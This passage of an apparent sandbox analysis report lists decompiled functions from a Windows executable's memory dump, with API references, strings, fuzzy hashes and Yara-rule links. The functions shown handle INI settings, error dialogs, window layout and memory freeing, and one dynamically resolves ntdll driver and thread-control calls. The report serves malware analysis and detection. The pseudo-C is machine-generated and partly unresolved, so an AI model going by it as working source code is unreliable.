					return GetPrivateProfileStringW(_a8, _a12, _a16, __esi, _a20, _a24);
				} else {
					if(__esi == 0 || wcschr(__esi, 0x22) == 0) {
						_push(_a24);
					} else {
						_v131076 = _v131076 & 0x00000000;
						_push(__esi);
						_push(L"\"%s\"");
						_push(0xfffe);
						_push( &_v131076);
						L0040B1EC();
						_push(_a24);
						_push( &_v131076);
					}
					return WritePrivateProfileStringW(_a8, _a12, ??, ??);
				}
			}

APIs

wcschr.MSVCRT ref: 00409D79
_snwprintf.MSVCRT ref: 00409D9E
WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00409DBC
GetPrivateProfileStringW.KERNEL32 ref: 00409DD4

Strings

"%s", xrefs: 00409D8D

Memory Dump Source

Source File: 0000000B.00000002.765299498.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.765285312.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765314693.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765324867.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.765331164.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: PrivateProfileString$Write_snwprintfwcschr
String ID: "%s"
API String ID: 1343145685-3297466227
Opcode ID: ba2a529124e3a207c998afa530794a8b3af16421fe15764eebdae90aacee263b
Instruction ID: cff84325bbeeabecfb89bf19508a3778b9d9768fc6139f0f3fcaa17558a1ecc1
Opcode Fuzzy Hash: ba2a529124e3a207c998afa530794a8b3af16421fe15764eebdae90aacee263b
Instruction Fuzzy Hash: BA018B3244421AFADF219F90DC45FDA3B6AEF04348F008065BA14701E3D739C921DB98

Uniqueness

Uniqueness Score: -1.00%

Function 004047D2, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31
windowCOMMON

Download Yara Rule

C-Code - Quality: 38%

			E004047D2(long __ecx, void* __eflags, struct HWND__* _a4) {
				char _v2052;
				short _v4100;
				void* __edi;
				long _t15;
				long _t16;

				_t15 = __ecx;
				E0040B550(0x1000, __ecx);
				_t16 = _t15;
				if(_t16 == 0) {
					_t16 = GetLastError();
				}
				E00404706(_t16,  &_v2052);
				_push( &_v2052);
				_push(_t16);
				_push(L"Error %d: %s");
				_push(0x400);
				_push( &_v4100);
				L0040B1EC();
				return MessageBoxW(_a4,  &_v4100, L"Error", 0x30);
			}

0x004047d2
0x004047da
0x004047e0
0x004047e4
0x004047ec
0x004047ec
0x004047f5
0x00404800
0x00404801
0x00404802
0x0040480d
0x00404812
0x00404813
0x00404834

APIs

GetLastError.KERNEL32(?,?,004035EB,?,?), ref: 004047E6
_snwprintf.MSVCRT ref: 00404813
MessageBoxW.USER32(?,?,Error,00000030), ref: 0040482C

Strings

Error %d: %s, xrefs: 00404802
Error, xrefs: 0040481D

Memory Dump Source

Source File: 0000000B.00000002.765299498.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.765285312.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765314693.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765324867.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.765331164.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastMessage_snwprintf
String ID: Error$Error %d: %s
API String ID: 313946961-1552265934
Opcode ID: 9fa9ceadd2aea683486b90f32a73d9d70e1e2e007ee85f632c4fe4fcea7526ce
Instruction ID: 90e5118ee4f46ea14b6138c5fdcdbe0805ab296af9aaa7bfd3b1d45c15712702
Opcode Fuzzy Hash: 9fa9ceadd2aea683486b90f32a73d9d70e1e2e007ee85f632c4fe4fcea7526ce
Instruction Fuzzy Hash: 30F08975500208A6C711A795CC46FD572ACEB44785F0401B6B604F31C1DB78AA448A9C

Uniqueness

Uniqueness Score: -1.00%

Function 004068EC, Relevance: 7.6, APIs: 6, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E004068EC(intOrPtr* __eax, void* __eflags, intOrPtr _a4) {
				void* _v8;
				signed int _v12;
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				signed int _t74;
				signed int _t76;
				signed short _t85;
				signed int _t87;
				intOrPtr _t88;
				signed short _t93;
				void* _t95;
				signed int _t124;
				signed int _t126;
				signed int _t128;
				intOrPtr* _t131;
				signed int _t135;
				signed int _t137;
				signed int _t138;
				void* _t141;
				void* _t142;
				void* _t146;

				_t142 = __eflags;
				_push(_t102);
				_t131 = __eax;
				 *((intOrPtr*)(__eax + 4)) =  *((intOrPtr*)( *__eax + 0x68))();
				E00406746(__eax);
				 *(_t131 + 0x38) =  *(_t131 + 0x38) & 0x00000000;
				_t135 = 5;
				 *((intOrPtr*)(_t131 + 0x2a0)) = _a4;
				_t124 = 0x14;
				_t74 = _t135 * _t124;
				 *(_t131 + 0x2d0) = _t135;
				_push( ~(0 | _t142 > 0x00000000) | _t74);
				L0040B26C();
				 *(_t131 + 0x2d4) = _t74;
				_t126 = 0x14;
				_t76 = _t135 * _t126;
				_push( ~(0 | _t142 > 0x00000000) | _t76);
				L0040B26C();
				_t95 = 0x40f008;
				 *(_t131 + 0x40) = _t76;
				_v8 = 0x40f008;
				do {
					_t137 =  *_t95 * 0x14;
					memcpy( *(_t131 + 0x2d4) + _t137, _t95, 0x14);
					_t24 = _t95 + 0x14; // 0x40f01c
					memcpy( *(_t131 + 0x40) + _t137, _t24, 0x14);
					_t85 =  *( *(_t131 + 0x2d4) + _t137 + 0x10);
					_t141 = _t141 + 0x18;
					_v12 = _t85;
					 *( *(_t131 + 0x40) + _t137 + 0x10) = _t85;
					if((_t85 & 0xffff0000) == 0) {
						 *( *(_t131 + 0x2d4) + _t137 + 0x10) = E00405B81(_t85 & 0x0000ffff);
						_t93 = E00405B81(_v12 | 0x00010000);
						_t95 = _v8;
						 *( *(_t131 + 0x40) + _t137 + 0x10) = _t93;
					}
					_t95 = _t95 + 0x28;
					_t146 = _t95 - 0x40f0d0;
					_v8 = _t95;
				} while (_t146 < 0);
				 *(_t131 + 0x44) =  *(_t131 + 0x44) & 0x00000000;
				_t138 = 5;
				_t128 = 4;
				_t87 = _t138 * _t128;
				 *((intOrPtr*)(_t131 + 0x48)) = 1;
				 *(_t131 + 0x2c) = _t138;
				 *((intOrPtr*)(_t131 + 0x28)) = 0x20;
				_push( ~(0 | _t146 > 0x00000000) | _t87);
				L0040B26C();
				_push(0xc);
				 *(_t131 + 0x30) = _t87;
				L0040B26C();
				_t139 = _t87;
				if(_t87 == 0) {
					_t88 = 0;
					__eflags = 0;
				} else {
					_t88 = E00406607(_a4,  *((intOrPtr*)(_t131 + 0x58)), _t139);
				}
				 *((intOrPtr*)(_t131 + 0x2c0)) = _t88;
				 *((intOrPtr*)(_t131 + 0x4c)) = 1;
				 *((intOrPtr*)(_t131 + 0x50)) = 0;
				 *((intOrPtr*)(_t131 + 0x2b4)) = 1;
				 *((intOrPtr*)(_t131 + 0x2b8)) = 0;
				 *((intOrPtr*)(_t131 + 0x2bc)) = 0;
				 *((intOrPtr*)(_t131 + 0x2c4)) = 1;
				 *((intOrPtr*)(_t131 + 0x2c8)) = 1;
				 *((intOrPtr*)(_t131 + 0x334)) = 0x32;
				 *((intOrPtr*)(_t131 + 0x5c)) = 0xffffff;
				return E0040686C(_t131);
			}

APIs

Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406752
Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406760
Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406771
Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406788
Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406791

??2@YAPAXI@Z.MSVCRT ref: 0040692E
??2@YAPAXI@Z.MSVCRT ref: 0040694A
memcpy.MSVCRT ref: 0040696D
memcpy.MSVCRT ref: 0040697E
??2@YAPAXI@Z.MSVCRT ref: 00406A01
??2@YAPAXI@Z.MSVCRT ref: 00406A0B

Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
Part of subcall function 00405B81: LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
Part of subcall function 00405B81: memcpy.MSVCRT ref: 00405C99

Part of subcall function 00405B81: wcscpy.MSVCRT ref: 00405C02
Part of subcall function 00405B81: wcslen.MSVCRT ref: 00405C20
Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E

Memory Dump Source

Source File: 0000000B.00000002.765299498.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.765285312.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765314693.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765324867.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.765331164.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: ??3@$??2@$memcpy$HandleModule$LoadStringwcscpywcslen
String ID:
API String ID: 975042529-0
Opcode ID: 7b5c259927b59544c1da32c87fb64e8a434fc950baf11122839f6010e947eddb
Instruction ID: 1f3882e7c97b8b8272a376ef7761bc0b0e9511dafd47f947fc31f4e13e233f39
Opcode Fuzzy Hash: 7b5c259927b59544c1da32c87fb64e8a434fc950baf11122839f6010e947eddb
Instruction Fuzzy Hash: 53414EB1B01715AFD718DF39C88A75AFBA4FB08314F10422FE519D7691D775A8108BC8

Uniqueness

Uniqueness Score: -1.00%

Function 004097A9, Relevance: 7.6, APIs: 5, Instructions: 112
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E004097A9(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
				int _v8;
				int _v12;
				intOrPtr _v16;
				void* _v20;
				int _v24;
				void _v56;
				char _v584;
				char _v588;
				char _v41548;
				void* __edi;
				void* _t40;
				void _t46;
				intOrPtr _t47;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr _t67;
				intOrPtr _t71;
				int _t77;
				void* _t80;
				void* _t81;
				void* _t82;
				void* _t83;

				E0040B550(0xa248, __ecx);
				_t77 = 0;
				_v8 = 0;
				E00408E31();
				_t40 =  *0x41c47c;
				if(_t40 != 0) {
					_t40 =  *_t40(5,  &_v41548, 0xa000,  &_v8);
				}
				if(_v8 == _t77) {
					_v8 = 0x186a0;
				}
				_v8 = _v8 + 0x3e80;
				_push(_v8);
				L0040B26C();
				_t81 = _t40;
				_v20 = _t81;
				memset(_t81, _t77, _v8);
				_t83 = _t82 + 0x10;
				_v24 = _t77;
				E00408E31();
				E00408F2A(0x41c47c, _t81, _v8,  &_v24);
				L5:
				while(1) {
					if( *((intOrPtr*)(_t81 + 0x3c)) == _t77) {
						L16:
						_t46 =  *_t81;
						_t77 = 0;
						if(_t46 == 0) {
							_push(_v20);
							L0040B272();
							return _t46;
						}
						_t81 = _t81 + _t46;
						continue;
					}
					_t47 = _a4;
					_t71 =  *((intOrPtr*)(_t47 + 0x34));
					_v12 = _t77;
					_v16 = _t71;
					if(_t71 <= _t77) {
						L10:
						_t66 = 0;
						L11:
						if(_t66 == 0) {
							E004090AF( &_v588);
							E00404923(0x104,  &_v584,  *((intOrPtr*)(_t81 + 0x3c)));
							_t32 = _t81 + 0x20; // 0x20
							memcpy( &_v56, _t32, 8);
							_t83 = _t83 + 0x10;
							E004099ED(_a4 + 0x28,  &_v588);
						} else {
							_t26 = _t66 + 4; // 0x4
							_t72 = _t26;
							if( *_t26 == 0) {
								E00404923(0x104, _t72,  *((intOrPtr*)(_t81 + 0x3c)));
								_t28 = _t81 + 0x20; // 0x20
								memcpy(_t66 + 0x214, _t28, 8);
								_t83 = _t83 + 0x10;
							}
						}
						goto L16;
					}
					_t67 =  *((intOrPtr*)(_t81 + 0x44));
					_t80 = _t47 + 0x28;
					while(1) {
						_t64 = E00405A92(_v12, _t80);
						if( *_t64 == _t67) {
							break;
						}
						_v12 = _v12 + 1;
						if(_v12 < _v16) {
							continue;
						}
						goto L10;
					}
					_t66 = _t64;
					goto L11;
				}
			}

APIs

Part of subcall function 00408E31: GetModuleHandleW.KERNEL32(ntdll.dll,?,004097C3), ref: 00408E44
Part of subcall function 00408E31: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00408E5B
Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtLoadDriver), ref: 00408E6D
Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 00408E7F
Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 00408E91
Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 00408EA3
Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtQueryObject), ref: 00408EB5
Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtOpenThread), ref: 00408EC7
Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtClose), ref: 00408ED9
Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtQueryInformationThread), ref: 00408EEB
Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtSuspendThread), ref: 00408EFD
Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtResumeThread), ref: 00408F0F
Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtTerminateThread), ref: 00408F21

??2@YAPAXI@Z.MSVCRT ref: 004097F6
memset.MSVCRT ref: 00409805
memcpy.MSVCRT ref: 0040988A
memcpy.MSVCRT ref: 004098C0
??3@YAXPAX@Z.MSVCRT ref: 004098EC

Memory Dump Source

Source File: 0000000B.00000002.765299498.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.765285312.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765314693.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765324867.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.765331164.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$memcpy$??2@??3@HandleModulememset
String ID:
API String ID: 3641025914-0
Opcode ID: 5e4299bbf46472c45a4c6d50f6a05ce4ddc252402b4fb65f630eed7603d777c4
Instruction ID: bb54f3dbfe595cb11ae02f9551d523dabe65b88657fa4b418f7fa82d5da08bd9
Opcode Fuzzy Hash: 5e4299bbf46472c45a4c6d50f6a05ce4ddc252402b4fb65f630eed7603d777c4
Instruction Fuzzy Hash: BF41C172900209EFDB10EBA5C8819AEB3B9EF45304F14847FE545B3292DB78AE41CB59

Uniqueness

Uniqueness Score: -1.00%

Function 004067AC, Relevance: 7.6, APIs: 5, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E004067AC(char** __edi) {
				void* __esi;
				void* _t9;
				void** _t11;
				char** _t15;
				char** _t24;
				void* _t25;
				char* _t28;
				char* _t29;
				char* _t30;
				char* _t31;
				char** _t33;

				_t24 = __edi;
				 *__edi = "cf@";
				_t9 = E00406746(__edi);
				_t28 = __edi[5];
				if(_t28 != 0) {
					_t9 = E004055D1(_t9, _t28);
					_push(_t28);
					L0040B272();
				}
				_t29 = _t24[4];
				if(_t29 != 0) {
					_t9 = E004055D1(_t9, _t29);
					_push(_t29);
					L0040B272();
				}
				_t30 = _t24[3];
				if(_t30 != 0) {
					_t9 = E004055D1(_t9, _t30);
					_push(_t30);
					L0040B272();
				}
				_t31 = _t24[2];
				if(_t31 != 0) {
					E004055D1(_t9, _t31);
					_push(_t31);
					L0040B272();
				}
				_t15 = _t24;
				_pop(_t32);
				_push(_t24);
				_t33 = _t15;
				_t25 = 0;
				if(_t33[1] > 0 && _t33[0xd] > 0) {
					do {
						 *((intOrPtr*)( *((intOrPtr*)(E0040664E(_t33, _t25))) + 0xc))();
						_t25 = _t25 + 1;
					} while (_t25 < _t33[0xd]);
				}
				_t11 =  *( *_t33)();
				free( *_t11);
				return _t11;
			}

APIs

Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406752
Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406760
Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406771
Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406788
Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406791

??3@YAXPAX@Z.MSVCRT ref: 004067C7
??3@YAXPAX@Z.MSVCRT ref: 004067DA
??3@YAXPAX@Z.MSVCRT ref: 004067ED
??3@YAXPAX@Z.MSVCRT ref: 00406800
free.MSVCRT(00000000), ref: 00406839

Part of subcall function 004055D1: free.MSVCRT(?,00405843,00000000,?,00000000), ref: 004055DA

Memory Dump Source

Source File: 0000000B.00000002.765299498.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.765285312.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765314693.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765324867.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.765331164.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: ??3@$free
String ID:
API String ID: 2241099983-0
Opcode ID: fae72e90abf19a0f598a0744b86edfa2e5e81d8d411ebeda80197a1c121c0671
Instruction ID: 35b4881f8254e3ed5d778deec4dde62c4732b660dc94e1daad4ca6c431b67ac1
Opcode Fuzzy Hash: fae72e90abf19a0f598a0744b86edfa2e5e81d8d411ebeda80197a1c121c0671
Instruction Fuzzy Hash: 4E010233902D209BCA217B2A950541FB395FE82B24316807FE802772C5CF38AC618AED

Uniqueness

Uniqueness Score: -1.00%

Function 00405CF8, Relevance: 7.5, APIs: 5, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405CF8(void* __esi, struct HWND__* _a4, signed int _a8) {
				intOrPtr _v12;
				struct tagPOINT _v20;
				struct tagRECT _v36;
				int _t27;
				struct HWND__* _t30;
				struct HWND__* _t32;

				_t30 = _a4;
				if((_a8 & 0x00000001) != 0) {
					_t32 = GetParent(_t30);
					GetWindowRect(_t30,  &_v20);
					GetClientRect(_t32,  &_v36);
					MapWindowPoints(0, _t32,  &_v20, 2);
					_t27 = _v36.right - _v12 - _v36.left;
					_v20.x = _t27;
					SetWindowPos(_t30, 0, _t27, _v20.y, 0, 0, 5);
				}
				if((_a8 & 0x00000002) != 0) {
					E00404FBB(_t30);
				}
				return 1;
			}

0x00405d03
0x00405d06
0x00405d10
0x00405d17
0x00405d22
0x00405d32
0x00405d40
0x00405d48
0x00405d4e
0x00405d54
0x00405d59
0x00405d5c
0x00405d61
0x00405d67

APIs

GetParent.USER32(?), ref: 00405D0A
GetWindowRect.USER32 ref: 00405D17
GetClientRect.USER32 ref: 00405D22
MapWindowPoints.USER32 ref: 00405D32
SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00405D4E

Memory Dump Source

Source File: 0000000B.00000002.765299498.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.765285312.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765314693.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765324867.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.765331164.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Rect$ClientParentPoints
String ID:
API String ID: 4247780290-0
Opcode ID: a641cd19a410ed6a125ee0f2f41aa3775212a32dac042a11be58197803c42fc2
Instruction ID: c328b93d85e4c90ccc2b92edbac8192aeb41fc184e748709fb0c9a3f9f2b3a5a
Opcode Fuzzy Hash: a641cd19a410ed6a125ee0f2f41aa3775212a32dac042a11be58197803c42fc2
Instruction Fuzzy Hash: 41012932801029BBDB119BA59D8DEFFBFBCEF46750F04822AF901A2151D73895028BA5

Uniqueness

Uniqueness Score: -1.00%

Function 004083DC, Relevance: 7.5, APIs: 5, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E004083DC(void* __eax, int __ebx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _v16;
				void* _t20;
				void* _t21;
				signed int _t28;
				void* _t32;
				void* _t34;

				_t20 = __eax;
				_v12 = _v12 & 0x00000000;
				_push(__ebx);
				_t28 = __eax - 1;
				L0040B26C();
				_v16 = __eax;
				if(_t28 > 0) {
					_t21 = _a4;
					_v8 = __ebx;
					_v8 =  ~_v8;
					_t32 = _t28 * __ebx + _t21;
					_a4 = _t21;
					do {
						memcpy(_v16, _a4, __ebx);
						memcpy(_a4, _t32, __ebx);
						_t20 = memcpy(_t32, _v16, __ebx);
						_a4 = _a4 + __ebx;
						_t32 = _t32 + _v8;
						_t34 = _t34 + 0x24;
						_v12 = _v12 + 1;
						_t28 = _t28 - 1;
					} while (_t28 > _v12);
				}
				_push(_v16);
				L0040B272();
				return _t20;
			}

APIs

??2@YAPAXI@Z.MSVCRT ref: 004083EB
memcpy.MSVCRT ref: 00408413
memcpy.MSVCRT ref: 0040841D
memcpy.MSVCRT ref: 00408427
??3@YAXPAX@Z.MSVCRT ref: 00408442

Memory Dump Source

Source File: 0000000B.00000002.765299498.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.765285312.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765314693.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765324867.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.765331164.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memcpy$??2@??3@
String ID:
API String ID: 1252195045-0
Opcode ID: ae14ed78cb3b9c7a1656bdd7c9bb9ccf218141e25ab2435f791856beeb738110
Instruction ID: 529a25ebd12540bef40c4bbbf5f662c822a20cdbd1f214c79cf6c3b5efc5d95d
Opcode Fuzzy Hash: ae14ed78cb3b9c7a1656bdd7c9bb9ccf218141e25ab2435f791856beeb738110
Instruction Fuzzy Hash: 61017176C0410CBBCF006F99D8859DEBBB8EF40394F1080BEF80476161D7355E519B98

Uniqueness

Uniqueness Score: -1.00%

Function 00406746, Relevance: 7.5, APIs: 5, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E00406746(void* __esi) {
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr _t11;
				intOrPtr* _t18;
				void* _t19;

				_t19 = __esi;
				_t9 =  *((intOrPtr*)(__esi + 0x30));
				if(_t9 != 0) {
					_push(_t9);
					L0040B272();
				}
				_t10 =  *((intOrPtr*)(_t19 + 0x40));
				if(_t10 != 0) {
					_push(_t10);
					L0040B272();
				}
				_t11 =  *((intOrPtr*)(_t19 + 0x2d4));
				if(_t11 != 0) {
					_push(_t11);
					L0040B272();
				}
				_t18 =  *((intOrPtr*)(_t19 + 0x2c0));
				if(_t18 != 0) {
					_t11 =  *_t18;
					if(_t11 != 0) {
						_push(_t11);
						L0040B272();
						 *_t18 = 0;
					}
					_push(_t18);
					L0040B272();
				}
				 *((intOrPtr*)(_t19 + 0x2c0)) = 0;
				 *((intOrPtr*)(_t19 + 0x30)) = 0;
				 *((intOrPtr*)(_t19 + 0x40)) = 0;
				 *((intOrPtr*)(_t19 + 0x2d4)) = 0;
				return _t11;
			}

APIs

??3@YAXPAX@Z.MSVCRT ref: 00406752
??3@YAXPAX@Z.MSVCRT ref: 00406760
??3@YAXPAX@Z.MSVCRT ref: 00406771
??3@YAXPAX@Z.MSVCRT ref: 00406788
??3@YAXPAX@Z.MSVCRT ref: 00406791

Memory Dump Source

Source File: 0000000B.00000002.765299498.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.765285312.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765314693.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765324867.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.765331164.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: ??3@
String ID:
API String ID: 613200358-0
Opcode ID: 086bdf89973be9db751c02ba5940a011d1fc21caf14060528ff21e4da5d0ecd6
Instruction ID: 2146815d826ad61a6329a34e2799f13692f9223f7a0132405705f454cb51ab02
Opcode Fuzzy Hash: 086bdf89973be9db751c02ba5940a011d1fc21caf14060528ff21e4da5d0ecd6
Instruction Fuzzy Hash: E1F0ECB2504701DBDB24AE7D99C881FA7E9BB05318B65087FF14AE3680C738B850461C

Uniqueness

Uniqueness Score: -1.00%

Function 0040ABA5, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E0040ABA5(intOrPtr __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				struct HDWP__* _v8;
				intOrPtr _v12;
				void* __ebx;
				intOrPtr _t37;
				intOrPtr _t42;
				RECT* _t44;

				_push(__ecx);
				_push(__ecx);
				_t42 = __ecx;
				_v12 = __ecx;
				if(_a4 != 5) {
					if(_a4 != 0xf) {
						if(_a4 == 0x24) {
							_t37 = _a12;
							 *((intOrPtr*)(_t37 + 0x18)) = 0xc8;
							 *((intOrPtr*)(_t37 + 0x1c)) = 0xc8;
						}
					} else {
						E00402EC8(__ecx + 0x378);
					}
				} else {
					_v8 = BeginDeferWindowPos(3);
					_t44 = _t42 + 0x378;
					E00402E22(_t44, _t21, 0x65, 0, 0, 1, 1);
					E00402E22(_t44, _v8, 1, 1, 1, 0, 0);
					E00402E22(_t44, _v8, 2, 1, 1, 0, 0);
					EndDeferWindowPos(_v8);
					InvalidateRect( *(_t44 + 0x10), _t44, 1);
					_t42 = _v12;
				}
				return E00402CED(_t42, _a4, _a8, _a12);
			}

APIs

BeginDeferWindowPos.USER32 ref: 0040ABBA

Part of subcall function 00402E22: GetDlgItem.USER32 ref: 00402E32
Part of subcall function 00402E22: GetClientRect.USER32 ref: 00402E44
Part of subcall function 00402E22: DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000004), ref: 00402EB4

EndDeferWindowPos.USER32(?), ref: 0040ABFE
InvalidateRect.USER32(?,?,00000001), ref: 0040AC09

Strings

$, xrefs: 0040AC28

Memory Dump Source

Source File: 0000000B.00000002.765299498.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.765285312.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765314693.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765324867.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.765331164.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: DeferWindow$Rect$BeginClientInvalidateItem
String ID: $
API String ID: 2498372239-3993045852
Opcode ID: 3646c4f7f2df3bce7363561434de74107494107a1dc9a7f0debf38e758269ced
Instruction ID: c4de0c57513a3fc8bb763215dcca23c205eee760976c5819edcd99f4220bed98
Opcode Fuzzy Hash: 3646c4f7f2df3bce7363561434de74107494107a1dc9a7f0debf38e758269ced
Instruction Fuzzy Hash: 9A11ACB1544208FFEB229F51CD88DAF7A7CEB85788F10403EF8057A280C6758E52DBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00403A73, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54
keyboardwindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403A73(void* __esi, struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t14;

				if(_a8 == 0x100 && _a12 == 0x41) {
					GetKeyState(0xa2);
					if(E00403A60(0xa2) != 0 || E00403A60(0xa3) != 0) {
						if(E00403A60(0xa0) == 0 && E00403A60(0xa1) == 0 && E00403A60(0xa4) == 0) {
							_t14 = E00403A60(0xa5);
							if(_t14 == 0) {
								SendMessageW(_a4, 0xb1, _t14, 0xffffffff);
							}
						}
					}
				}
				return CallWindowProcW( *0x40f2f0, _a4, _a8, _a12, _a16);
			}

0x00403a7d
0x00403a8c
0x00403a9c
0x00403aba
0x00403adf
0x00403ae7
0x00403af4
0x00403af4
0x00403ae7
0x00403aba
0x00403a9c
0x00403b13

APIs

GetKeyState.USER32(000000A2), ref: 00403A8C

Part of subcall function 00403A60: GetKeyState.USER32(?), ref: 00403A64

SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00403AF4
CallWindowProcW.USER32(?,00000100,?,?), ref: 00403B0C

Strings

A, xrefs: 00403A7F

Memory Dump Source

Source File: 0000000B.00000002.765299498.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.765285312.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765314693.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765324867.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.765331164.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: State$CallMessageProcSendWindow
String ID: A
API String ID: 3924021322-3554254475
Opcode ID: 7a91954c753d57b62ada695ad1095f0bf88fde31d04a203a00175be824b18610
Instruction ID: 3f4bab65c8f2f559ff61c6136e8e970ba349fdfc906a465d58382778652fa82c
Opcode Fuzzy Hash: 7a91954c753d57b62ada695ad1095f0bf88fde31d04a203a00175be824b18610
Instruction Fuzzy Hash: AC01483130430AAEFF11DFE59D02ADA3A5CAF15327F114036FA96B81D1DBB887506E59

Uniqueness

Uniqueness Score: -1.00%

Function 004034F0, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 51
COMMON

Download Yara Rule

